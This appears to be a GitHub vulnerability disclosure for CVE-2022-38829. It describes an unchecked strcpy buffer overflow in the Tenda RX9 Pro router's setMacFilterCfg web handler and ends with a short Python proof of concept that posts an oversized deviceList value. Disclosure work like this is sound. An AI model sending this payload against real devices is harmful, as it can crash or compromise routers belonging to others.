Headline
CVE-2022-38829: CVE/setMacFilterCfg.md at main · whiter6666/CVE
Tenda RX9_Pro V22.03.02.10 is vulnerable to Buffer Overflow via httpd/setMacFilterCfg.
Permalink
1 contributor
Users who have contributed to this file
buffer overflow****Tenda_RX9_Pro
version: V22.03.02.10
Description:
There is a buffer overflow in httpd/setMacFilterCfg
Source:
you may download it from : https://www.tendacn.com/download/detail-4218.html
Analyse:
get value from deviceList
then call sub_4223E0
finally call strcpy ,dont check the length, cause buff overflow
POC
url = "http://192.168.1.13/goform/setMacFilterCfg"
payload = 'A'*300 + '\n'
r = requests.post(url, data={'deviceList': payload})